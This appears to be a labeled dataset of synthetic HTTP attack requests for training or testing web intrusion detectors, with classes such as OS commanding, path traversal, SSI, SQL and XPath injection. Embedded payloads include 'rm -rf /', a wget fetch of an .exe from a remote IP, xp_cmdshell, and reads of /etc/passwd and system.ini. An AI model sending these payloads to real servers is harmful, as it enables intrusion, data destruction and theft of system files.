Authorization: Digest algorithm=MD5-sess
Range: 77-,76-
Referer: http://paxr4.fr/ad5aiP/rSth5.ace
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/2.0 (X11; U; Open BSD i386 5.6; l8-7w; rv:3.2.6) Gecko/49338599
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3700x2595
Via: 0.7 153.90.85.13
Transfer-Encoding: identity
Upgrade: sS7i/3.2, haaoxa/5.4, fair/8.2
Warning: 290 www.isci.css:805 "iIseaaalda5ig" "Wed, 15 Oct 08 18:13:14 GMT"
X-Forwarded-For: 152.42.151.28
X-Serial-Number: 814494240740
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38082
Start - Id: 42862
class: OsCommanding
GET /dropy1QiNM/npSgY3rj/efWfZGp/hbd/RjF/9K9.3Nj_/4qePnDZm6y.html?XKE8GhtpassMGJi.V=484786&oianfu9y846wyRo=e%40ZO7KRt%40MI8&zstniaEehs0D=%24snvarse1&bkaccepttD=ogu3xs%29drslUt+e&3mt=wuihfL+nvbscriptprr&oada4thtwt=zLFn19x5Dm&dTetaaedEo9=847701&edcwuZWsqE=vhathaving%7Ei+b+cmdod5&yncenforupera0s=4n%2F&bTe0rc6eevn4=413928563&hr4cN1ck65FenAV=%7C++++dir++++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+++%2C&niXrt=teEigk&toel=%3Cd HTTP/1.1
Host: 240.147.105.66
Connection: close
Accept: */*
Accept-Charset: koi8;q=0.5, windows-1255;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: iagrlr-Amadza
Cache-Control: mEjirm=oehl
Client-ip: 96.97.111.110
Cookie: 8EX0E3kT=wUdndgihiseimainss;ueliwdn=61;etEn=wioerrditaedaofsrf;l4orqh=iqmbyV3Rx
Cookie2: $Version="08"
Date: Mon, 29 Nov 04 13:12:51 UTC
ETag: W/"2uen9B8kkt8qjQvH"
Expect: ecdm
From: l6tz5hd@ruglhe.be
If-Modified-Since: Thu, 14 Feb 08 20:19:34 UTC
If-Unmodified-Since: Tue, 12 Jun 07 22:01:41 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 14 Nov 05 17:51:49 CET
Max-Forwards: 2
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic YXNmZDp0bW84dHo=
Authorization: Basic Y3J0aGQ6bmR0amli
Range: 220375-
Referer: /horsnln.fgf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.4 (Machintosh; U; PPC Mac OS X 8.0; oh-wx; rv:7.2.8) Gecko/42549319
UA-CPU: x86
UA-Disp: 0286,0560,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 625x3364
Via: HTTP/7.7 www.erkth.tiff, 5.4 www.monrr.css, FTP/7.5 148.61.28.128
Transfer-Encoding: compress
Upgrade: gds/3.0, ehewef/0.6, eator/3.4, mwnet/5.2, hnta/0.2
Warning: 272 www.t95pnmr9.gif "tHepe" "Fri, 23 Apr 04 03:09:24 CET"
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42862
Start - Id: 45295
class: PathTransversal
GET /3cs/ipAmDRT/ndu233q.css?ZopenVE=r+h%5B&hlBIYaot=diofbautoexece%7Cv&naXi1rr0La=loodorku8oap&tbvatsslfeeik=223&vawrscUu27erny=e1Ec&coetedeozo6eeb=0XQL4AOUzHK&id=%3C%2Bfst HTTP/1.0
Host: www.r4mmdgql2.uk
Connection: close
Accept: text/*;q=0.4, video/*;q=0.3
Accept-Charset: *
Accept-Encoding: ..\..\..\..\..\..\..\..\..\WINDOWS\system.ini
Accept-Language: lur-mlnrz, g8enms1-na;q=0.0, lts-oeinseo;q=0.1, w-imeSip;q=0.5
Cache-Control: ryo=tas
Date: Thu, 30 Sep 04 19:59:42 GMT
ETag: W/"mgjf-GvOatTktyi"
Expect: eeun
If-Modified-Since: Tue, 13 Nov 07 17:27:50 UTC
If-Unmodified-Since: Sat, 09 May 09 10:45:35 GMT
If-Match: "kEs_KrUUGbKyVU_"
If-None-Match: "q5VQs.XF4hsm18s"
If-Range: Tue, 18 Nov 08 05:31:25 CET
Max-Forwards: 16
Pragma: hiuie='iaih'
Proxy-Authorization: dnhat tciorE=dIorDai
Authorization: Basic NnZlbjpzb2FiaGhl
Range: 59-5054,-329
Referer: /lxdt9c/elsb.swf
TE: gzip,chunked;q=0.0
Trailer: Transfer-Encoding
User-Agent: enfhkPz
UA-OS: Win95
Via: HTTP/4.4 www.uEckiee.tiff
Transfer-Encoding: gzip
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 45295
Start - Id: 45948
class: PathTransversal
GET /1dNarnllttn8eR/kHm/kOsMvCX/hed2erdmtsern6hfuwI6.swf?TmochaBVD2v2X_div7=eaea0odrdutawb&sb=ntias0h&J86Ihavingz6=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&hftedEfe=myde4dcDqndcahl&jtirohye=227671&tgnqAlQW=82o%7Ei%7C%40q%3Etg&aeaiW4Esw=hzdoinM HTTP/1.1
Host: www.sdpl.ch
Connection: keep-alive
Accept: video/*
Accept-Charset: cp-950;q=0.9
Accept-Encoding: deflate, deflate;q=0.8, identity;q=0.2, identity;q=0.8
Accept-Language: *
Cache-Control: no-store
Client-ip: 81.34.102.44
Cookie: lyThsycaoua=achildeiQ3eval;lerree=56417288
Cookie2: $Version="0"
Date: Thu, 02 Nov 06 17:54:22 GMT
ETag: W/"Jy54JyeN5DvDzJBlnR"
Expect: crtlt=umde;foerOz=oacmedeu
From: cpanabu8@leeWhlh.biz
If-Modified-Since: Fri, 13 Feb 04 06:44:29 CET
If-Unmodified-Since: Wed, 05 Dec 07 17:16:41 CET
If-Match: "q2foPSNk1I8q8EYxL"
If-None-Match: "8IBIsprOc3jomCys"
If-Range: Fri, 04 Apr 08 01:52:26 GMT
Max-Forwards: 8
MIME-Version: 5.8
Pragma: aoahp0a='AteAe'
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Hh8ljl hkHpI=asiyO
Referer: http://www.hdsield.uk/eojeol/vlox/gvElnoa/Ttbt/sdSrurR.txt
TE: deflate;q=0.7,trailers,deflate
Trailer: Accept
User-Agent: iBp6Cfx7 http://www.wuwzA.it
UA-CPU: PowerPC
UA-Disp: 3135,8994,8
UA-OS: Windows NT
Via: HTTP/2.1 29.168.74.115, 0.2 134.12.39.7, 8.2 www.HEeenas.shtml
Transfer-Encoding: gzip
Upgrade: Eih/5.7, olse/5.3, eieecn/0.8
Warning: 240 244.77.211.173 "osnMh" 
X-Forwarded-For: 226.91.8.34
X-Serial-Number: 6933322511
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45948
Start - Id: 40618
class: SSI
GET /o845aectgAkrqsi5mouE/n2HK/6titbb/eh8.jpg?odqeed0e=%3C%21--++%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22--%3E&da=16153&xDxHnexec=jfi6&dstetptaiiath=82450&nscotecbn=dtcatks&n5riaeeayi9t3=thtacces&8dlnp=009&ogompnN=44&atUqeeiOheU=349 HTTP/1.0
Host: 75.43.83.180
Connection: close
Accept: audio/basic;q=0.4, audio/x-wav;q=0.5
Accept-Charset: x-mac-cyrillic
Accept-Encoding: gzip;q=0.7
Accept-Language: *;q=0.9
Cache-Control: no-transform
Cookie2: $Version="8"
Date: Wed, 24 Jun 09 10:52:43 CET
ETag: "BSYbTuX7wGz5Vkk"
If-Unmodified-Since: Tue, 17 Feb 09 16:31:52 UTC
If-Match: "gJn6iID_bB5P7NJr"
If-None-Match: "xfyccxVZX8PEhqBW"
Max-Forwards: 2
MIME-Version: 5.0
Pragma: no-cache
Authorization: syo0to xxevNu=56isuKo
Range: 656012-5
Referer: /eatdv/eleevsea/oilg.jsp
TE: gzip,trailers,gzip;q=0.9
Trailer: Upgrade
User-Agent: Mozilla/4.7 (compatible; MSIE 7.6; Mac OS X; siaelyaenl; hOoaakD; afertKYy)
Via: FTP/1.3 7.4.108.62
Upgrade: eItzhe/6.5, bifw/0.8, 2hwep/5.5, nRdrN/1.5, ncnna/4.9
Warning: 308 68.164.17.248 "itScteuheeanafg" 
X-Serial-Number: 5234187897202701

null

End - Id: 40618
Start - Id: 41191
class: SqlInjection
GET /i@XmDHJBRV@NI1TuX/15cW-Li6i4k-/o9ormlm9iba8suu/k83HLp-KT/GLinputidQzqlEfFTE/u5-Bojyc/eahiwtmudikFniuEc/n8/oInIeBmn4iistiutBoS/yomGhkn7_glu.php?sgevgi=y8X%40_M_g&bgnda=iAs&Nttiw1=hCcbnlxlgu4Ee&@AaexecC=rstyleoe HTTP/1.0
Host: www.ki3nznyd.be
Connection: close
Accept: */*
Accept-Charset: x-mac-roman
Accept-Encoding: '  OR  ''    ='
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 151.63.160.140
Cookie: oa2=taedYyG;et8axee=rm3&hifrtchildmnidet7;um8eeseKhnoacs0=482301464;B@jMZai=387197
Cookie2: $Version="3"
Date: Thu, 10 Feb 05 06:47:43 UTC
ETag: "ThY1cTTEqxmOVuYl"
Expect: ewi8imt=Eenc
From: hnrnbiad@nJninesrqA.biz
If-Modified-Since: Fri, 24 Dec 04 24:15:40 GMT
If-Unmodified-Since: Tue, 24 Feb 04 04:44:56 CET
If-Match: *
If-None-Match: "ceix1PT.YXfQIG7"
If-Range: Wed, 30 Dec 09 20:43:18 CET
Max-Forwards: 47
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic dGxzUDpoZW92aQ==
Authorization: Basic MWl0aWE6MGw0dGNhdA==
Range: 0731-3915
Referer: /hibcbnt.cfm
TE: trailers
Trailer: Date
User-Agent: pth260M/6.2
UA-CPU: MIPS
UA-Disp: 8221,0714,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9560x6945
Via: FTP/8.5 233.75.215.126
Transfer-Encoding: identity
Upgrade: eijtn/6.7, lQnT/6.1, aomess/4.2, rhpltp/2.7
Warning: 985 www.enaw.tiff "drga" "Tue, 12 Feb 08 13:07:34 CET"
X-Forwarded-For: 247.67.228.93
X-Serial-Number: 7584461693588
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41191
Start - Id: 36794
class: OsCommanding
GET /ywltSAtiec4ndeera/ETnet0/ie/rom4BOZFXtZ/wVi5f4LZr1yLVHiz/l6EpvkoqG23rbwFAWq.mdb?6reet7eeUt7N=n+htpassc%40&2yLnoTP=68&ycatKW2evalMocH=14&oyrtn=nreap+1kletcAsesoh+sl&elgtetil=%60rm+-rf+%2F+++%60&Zd1dfRsandpZh8=%40wsncxmltdyss&eOLV5f=e&drtotua1=aETKMyUCsF.&0ch=if&f9Rv=9769619 HTTP/1.1
Host: 173.10.215.223
Connection: fwttCe
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: rcqifa4s='cHed7'
Client-ip: 90.167.86.81
Cookie: Eofsanbzd=0>=h;9D0os=cBoSTui.F-dJ;nre7eqm=connectdo;1nT0AeseioriH=13197813
Cookie2: $Version="08"
Date: Mon, 29 Mar 04 15:35:19 UTC
ETag: W/"8334JjPUOIE_-tVFu"
Expect: sid9n=eluiuds;m3ishri=rjmr
From: wsCala@r0ragpmo.de
If-Modified-Since: Sat, 07 Feb 09 01:31:47 UTC
If-Unmodified-Since: Fri, 07 May 04 15:41:16 GMT
If-Match: *
If-None-Match: "h6uEFxJgOmve@m8qmR"
If-Range: "veBP4ERr77NlUMgYmQ"
Max-Forwards: 0802
MIME-Version: 1.3
Pragma: reuo5gst='pl'
Proxy-Authorization: ul8wy wpHmreh=nsssH2
Authorization: Digest qop=y6Mcma
Range: 907-5,-807
Referer: /Ieme.mpg
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: iwS_KeF http://www.mvrm.net
UA-CPU: PowerPC
UA-Disp: 9579,9287,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: 3.2 www.eitw.htm, ess/9.1 www.syhgu.jpg, HTTP/0.1 www.emmjrti.css
Transfer-Encoding: gzip
Upgrade: wfs/7.4
Warning: 870 www.spydgb.jpg "hrhsaomoChmoogw" 
X-Forwarded-For: 37.3.209.174
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36794
Start - Id: 46397
class: PathTransversal
GET /o4zrOmhruesrntiiiqe.nsf?ujnAoe=sFK4&esh=5055846&LYGt2X7FKcPt=jboeemcraeoEoungn&dgnraio=ae&einioidsTehto4=uohogo0%29g2havingliri&tna8ldElgva=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&eval0Ya1y=n2&lpDJk-eval=nRio5 HTTP/1.0
Host: 45.50.139.5
Connection: keep-alive
Accept: audio/*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: t-tunhundt, ycjrcw-2gnpr, eh-ohm6az, a-Ug73ee3e, ue5ma-et
Cache-Control: min-fresh=03
Client-ip: 232.215.173.164
Cookie: ie0trhrgh=ula2nauuso;m8oahonctZuc=7136524;tboneoS=nUR;ri=pfp;3ynohw5xeai6s=gycaxterm
Cookie2: $Version="9"
Date: Wed, 26 Sep 07 12:31:32 CET
ETag: W/"NmzUcd4Oc4.oiXZu9LS"
Expect: 100-continue
From: 5a6ct@oese.gov
If-Modified-Since: Mon, 22 Oct 07 12:50:18 CET
If-Unmodified-Since: Fri, 17 Nov 06 24:21:57 GMT
If-Match: *
If-None-Match: "RRP0poUXVovgCzsI"
If-Range: ".O49kysF44AplHO8z"
Max-Forwards: 2519
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: NTLM bmF6emVQbWV1ZW1BT091Z2dpZW5KZWF5VGV3bm9iYXNoZQ==
Range: 0-,-1441,-234089
Referer: /uqSduo/fDwghu/on7prnha.doc
TE: chunked,gzip
Trailer: Accept-Encoding
User-Agent: dattmd (iN4MdECqY-)
UA-CPU: MIPS
UA-Disp: 637,7292,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3216x516
Via: 4.4 www.Spyrs.css, HTTP/6.3 248.22.6.35, mn8ten/7.1 www.sfeea.html:056
Transfer-Encoding: t0ie; urjith=rLho
Upgrade: nri/5.0, rree/0.5, msno/4.0
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 188.93.207.249
X-Serial-Number: 75398657
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46397
Start - Id: 42810
class: OsCommanding
GET /eeeadFHbnrvf2k79d/rwShu1n/pE1OD_o88j/passthruENouHp.jpg? HTTP/1.1
Host: www.limre4f.net
Connection: keep-alive
Accept: image/*;q=0.8, text/plain;q=0.1, video/quicktime;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: *
Client-ip: 254.119.114.123
Cookie: 1qienV=207.104.66.254  |    cmd.exe /s
Date: Wed, 14 Mar 07 12:55:48 CET
Expect: fo4ti8
If-Unmodified-Since: Mon, 16 Jun 08 22:10:31 GMT
If-Range: Tue, 24 Jun 08 03:41:15 CET
Max-Forwards: 33
MIME-Version: 7.3
Proxy-Authorization: Basic dGlzTnNsaWM6bWFEc2FlVQ==
Authorization: jgdm1t ctahteu=qqsr
Referer: http://www.utoi.de/g6htls/cANniw/fQusaRat/ol4ph0/genpc.js
User-Agent: tLRkSCGh http://www.8manit.it
Via: 1.0 113.211.168.64, HTTP/6.9 www.lenhe.html, 8.0 24.25.8.202
----: ----------------

null

End - Id: 42810
Start - Id: 46211
class: PathTransversal
GET /pzoewd4Anhstbs/41m/m9ektsb/rr7ahdei2odm/ioeahpdeThrrTs/oljselTito/heehetJooOn/OQTQ0ZM/KY61p/af-/4uzm.mdb?c7B39ue=nF7M2qB&es3N=68&ax=blaJdrbrnsbYioc&im9ywGrkeon=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fts.conf&Ipyv=nfuYyCXk&dxdoi=or%24 HTTP/1.0
Host: 178.121.43.165:015
Connection: close
Accept: */*
Accept-Charset: windows-874;q=0.3, gb2312;q=0.4
Accept-Encoding: gzip, identity;q=0.3
Accept-Language: q8h0-qmatg;q=0.0, ie-0vlifqhc;q=0.8, aqwiOta-e4Ldtr, t1DElTt-aopfht;q=0.6
Cache-Control: max-stale=6156
Client-ip: 163.45.207.111
Cookie: nSvuayEeloeiobT=4spametame9d gcoh;ktey0anaan=rxE24RapYXUO;rmsts9eai=sstt;ZEQZt=rO@0IK
Cookie2: $Version="52"
Date: Wed, 10 Mar 10 16:56:51 CET
ETag: W/"BwoAIQ_gJnkwh@ELCI"
Expect: eeile=yRnaexhm
From: psqsm@3ah4otOset.org
If-Modified-Since: Fri, 06 Mar 09 22:45:35 CET
If-Unmodified-Since: Mon, 27 Dec 04 19:46:24 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 24 May 06 16:51:04 GMT
Max-Forwards: 0
MIME-Version: 5.5
Pragma: i1so4=1wEytna
Proxy-Authorization: Basic YWNlaTp0dVJlYw==
Authorization: Basic aDBlczptaWU5aQ==
Range: 63-8582,2-821656
Referer: http://ilbloejh.st/eyjSk/uceczug/sapxhu.mpeg
TE: chunked,trailers
Trailer: Date
User-Agent: Mozilla/4.7 (Windows; U; Win 9x 9.1; xi-pe; rv:0.9.2) Gecko/98522112
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 6581x3968
Via: qhh/8.1 23.121.86.177:2189, rnu/1.6 209.151.91.137:296
Transfer-Encoding: compress
Upgrade: peg/8.7, taas/9.0, SiHads/8.8, ne61as/9.8
Warning: 955 125.77.10.130 "jnrsAdmraidet" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 79986231728889
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46211
Start - Id: 39794
class: SSI
GET /ff0OSMsDFijbboM/y6/tUenhghnhygI4iEte/oBvBfbylBS7/edWt4ast/soiHibtuUa.shtml?8gaoesv=lhwls4Dgnttstdineydrgrw&dioEiutan=processing-instructioni&eRpc1rm=hd&mvumyitodbt=9663&wnecqcnxs4ssaut=86606&6seacrta7mlnucr=ahte&ran=nfr2ematiuvorimrff&ZxiN=7netcEr+Pj&tehnx=e&XzK18lFu=o&ltnayts=rssock_streamperl&ttap=9392332&efilagtih3IAnT=r5pFk135GuqL&rtkint=%3C%21--++%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22+--%3E HTTP/1.0
Host: 142.207.4.219
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: nmlgTB7-k;q=0.1, e-alPeel
Cache-Control: no-transform
Client-ip: 129.26.179.125
Cookie: Zi_6binMcAg=432;ehgneeet6=elnetcsnstr-eu
Cookie2: $Version="9"
Date: Sun, 17 Dec 06 21:55:13 UTC
ETag: "1MI3X5pRIo3ZW19eTlb1"
Expect: 100-continue
From: otit3le@ijlhneot1o.com
If-Modified-Since: Mon, 29 Aug 05 21:29:12 GMT
If-Unmodified-Since: Tue, 17 Nov 09 06:53:04 CET
If-Match: "bHJKkxda8xbD6vUFfSP"
If-None-Match: *
If-Range: Mon, 14 Feb 05 17:45:30 UTC
Max-Forwards: 6335
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest nc=Ca5d26eD
Authorization: Digest uri=http://www.wrOk.net/hoodei/i9fdm/hosOp8.rar
Range: -141,0-,96-
Referer: http://apesepl.uk/rralpah/ctol/7otdti.nsf
TE: gzip;q=0.7,trailers,gzip
Trailer: Upgrade
User-Agent: 7tso3/0.0.0
UA-CPU: Sparc
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 468x7869
Via: 2.2 151.153.217.8, 3.1 www.coeprt.css, 3.6 236.246.92.162
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
X-Forwarded-For: 203.248.148.225
X-Serial-Number: 39977076241136
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39794
Start - Id: 36752
class: OsCommanding
GET /ch0ATNTgNc/eQwb6/7Hr2ZnoPTCPZxsdfnDtz.gif?weh3otagtiiT=%5Cnwget+++http%3A%2F%2F154.152.76.25%3A116%2Fnftp.exe HTTP/1.1
Host: 156.148.11.121
Connection: taai
Accept: text/*;q=0.9, application/*;q=0.9
Accept-Charset: x-mac-chinesesimp, iso-8859-6, iso-8859-3, iso-8859-9;q=0.3, iso-8859-8-i;q=0.3
Accept-Encoding: deflate;q=0.8, compress
Accept-Language: 4-ha0ga, uonne-1oesoRa
Cache-Control: only-if-cached
Client-ip: 66.186.73.243
Cookie: e6e4WGErnre=heG7efdCnkEobhsp;rogl1Sueoeo=33123701
Cookie2: $Version="786"
Date: Sat, 05 Jun 04 15:18:42 CET
ETag: W/"f0JXW1xbhB1kOfJBE"
Expect: e8de2=3Ahleu;enneiwa=tarxteh
From: 9rrtotci@rtshul.org
If-Modified-Since: Wed, 19 May 04 04:29:15 UTC
If-Unmodified-Since: Thu, 06 Mar 08 02:57:21 CET
If-Match: "ZVkamxmYNQHKxVQpM86"
If-None-Match: "whlAbR@ZXAo_LZWA79"
If-Range: *
Max-Forwards: 4373
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest response="49a2dbb09A077a8FDd2baA76dAA5E5dd"
Authorization: NTLM MGVlYW5abVpzZW90SXNuSHVtZHNPMXN5bG50aWVpT2hucjM=
Range: 50-7
Referer: http://Lagv.st/msnS/drnulou.php
TE: trailers,deflate;q=0.1
Trailer: From
User-Agent: Mozilla/5.9 (X11; U; Linux i386 0.4; ad-ds; rv:1.6.5) Gecko/29497725
UA-CPU: x86
UA-Disp: 944,674,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 232x1783
Via: 5.9 www.bxici.css, FTP/6.7 201.125.173.100, inkn/3.9 234.106.150.30
Transfer-Encoding: deflate
Upgrade: sieis/2.5, uit/6.8
Warning: 508 www.fetrah.tiff "t7sycuhIpesS" "Wed, 10 Feb 10 05:46:21 GMT"
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36752
Start - Id: 41077
class: SqlInjection
GET /1.y2rPL_C5/eqftrlts/Dea/snXeatwtoesziDGf/lt7c_fUPzMi1/-WC/eaet0eh28det3eNe/ne1akiiNd6/tesnpa/yDjpr7.js?afie=4623&4t=0809835308&rie=723961&rtia6jedlchoh=exec+++++xp_cmdshell++++%27%22Oy%22++%3E%3E++script.vbs%27&d3eet=698772 HTTP/1.0
Host: www.f0dsTo.st
Connection: oi3d
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, identity;q=0.8, deflate;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 117.227.97.154
Cookie: i8i=nnsoror$%document]hB;2tt5=uf8I;@C8Q=mrl.NzzK;9D4positionpEU=dTGtK_;a6h=2080;53betweenunullqIwindow.open=4698369279
Cookie2: $Version="219"
Date: Thu, 20 Aug 09 17:59:51 UTC
ETag: "6r-fYwsYHOv4rS21"
Expect: aejsit=lchna;scmx
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Mon, 02 Mar 09 12:30:08 GMT
If-Unmodified-Since: Sun, 05 Aug 07 04:16:00 UTC
If-Match: *
If-None-Match: "Kp2pS1G@tfT7YH6"
If-Range: Mon, 28 Apr 08 11:28:12 UTC
Max-Forwards: 6
MIME-Version: 9.5
Pragma: aAhy='lthsed'
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Basic ZWVkbkg6dnNyYTliZDc=
Range: 253-,679517-254
Referer: http://www.nQ9t5e.cz/tiCsmni/eeqaI/rfl1rll/wmKrrswt/yuhd.png
TE: trailers
Trailer: From
User-Agent: xTa3sT0a6ctfo
UA-CPU: Sparc
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 194x0684
Via: hdDi/1.9 www.32ztm39u.jpg:13328, 9.3 44.84.62.7, ewl/1.6 218.202.17.43
Transfer-Encoding: identity
Upgrade: t1er/5.7
Warning: 604 www.hKNbdI.gif "crapaattI" "Thu, 10 Jun 04 12:26:14 UTC"
X-Forwarded-For: 110.167.165.101
X-Serial-Number: 54708069609443708
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41077
Start - Id: 39466
class: SSI
GET /RKNXf9XstjE90hQ/eYmowF5h.9a2/smbedoevaphnb9/Rj183LP/kebpinea/kbeeaeLre/9g.-9Yk8/czZC2BM/ects4etescbBzirrtgem/eof/ahntbcs/aGIVX0zP_q4v.html?ddmtsEr6ameo=dnLu&UnxSEhe8i=0203&rtWdoRltt=5315444&ds7tieshsce=22316368&acvsLeb=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.0
Host: 242.35.23.132:80
Connection: ohsesum
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, deflate;q=0.7, deflate, identity
Accept-Language: smrsne-h9C6;q=0.0, visnh-fes, eafilae-en1dey, Xi-utuof
Cache-Control: min-fresh=38895
Client-ip: 91.67.57.209
Cookie: ssYsnhi4cnL4p7T=aUciboA8Iem0lsn0e;Haj=e:r ;TXAbV=3854;4ito6Rle=r-a_
Cookie2: $Version="5"
Date: Fri, 18 Apr 08 15:53:02 UTC
ETag: "LhCcRWhjKnJRhPq"
Expect: ris5rtt=czils
From: a7fo@TTrA.it
If-Modified-Since: Thu, 28 May 09 01:42:21 GMT
If-Unmodified-Since: Sun, 20 Sep 09 06:36:51 CET
If-Match: "t6TsBAr4@C.TVfEkYD"
If-None-Match: *
If-Range: *
Max-Forwards: 1683
MIME-Version: 7.4
Pragma: dcsce='7aa'
Authorization: NTLM c2NiamVlZWhhZGR0YWhlb2VoRWVzaHRmMGFjZjJPdWl0eWV0aHNkRGlFZGRvdmlu
Range: -2397
Referer: http://oeaeRl.it/Fhdyq99/fennszpe/25es2het.exe
TE: gzip
Trailer: Referer
User-Agent: Mozilla/5.9 (Machintosh; U; PPC 3.1; 2a-Mt; rv:5.9.1) Gecko/76650123
UA-CPU: 68000
UA-Disp: 725,135,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 734x0733
Via: sorier/7.9 51.84.209.111, FTP/7.4 43.149.2.58
Transfer-Encoding: compress
Upgrade: mwv/5.9, jxt9eh/8.4, lch/8.1, nSc/9.6
Warning: 551 9.100.116.49 "enainhotv" 
----: -------------------------------------------------

null

End - Id: 39466
Start - Id: 48294
class: XPathInjection
GET /hhsTGVnZL_j-zcO7r/hAc5eOKxQQ/deIURDJPX713Fo/xYNCb.wAIGselectQ@from/ioPGu_gpFP-T@uYGI/i0QiQ_QqkjZQi5teDqo/Nl%u3/l6EO3SoGF@X6/ha9iseuHtssiI.gif?fr4aa7=44056&2n=hdexotqmddnter5ctt&m8szsnylwhod=iVRxSs5dAr&se=012823&dhsfja=aAfivbZdYZB&haTorduaeare=7&7iframeEh=29&hk1lheEylhedu=heeAee6g&tlaozo9t6ik=%29At%7C+a%7ExlEi%7Eyozdocumenthe&rrPf=tX6AELBLjuG1&trgcleNNser=zN-I7q8a&TAR-ECkbSfq=%25esetlnorjbinEe&0r9a=7467&tnaOum=06697 HTTP/1.1
Host: www.fecscd.fr:7517
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: sdieo5'  or    oyrL/33akl/child::node()[processing-instruction()=56]  or     'hohd'  =    '
Accept-Language: 8resohix-0syhpri, j9a-N, aA-ph5zey
Cache-Control: only-if-cached
Date: Tue, 03 Jul 07 03:11:14 CET
From: q9erhj@rCea.net
If-Modified-Since: Tue, 25 Jul 06 16:46:50 UTC
If-Unmodified-Since: Sat, 10 Oct 09 04:23:26 CET
If-Match: *
If-Range: *
Referer: http://www.etrngn.de/encsepw/Eoctgael/fhiOgzrt/asoropRa/hooiewb.mdb
TE: trailers,gzip
User-Agent: lNetrga (eXXKYc3r; tcBx0sl; d1oSGvfPl)
Via: I0lqo/6.2 112.126.152.74, tSnieu/8.6 www.ncyh.jpg:3446
Transfer-Encoding: gzip
X-Forwarded-For: 50.28.189.18
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48294
Start - Id: 40304
class: SSI
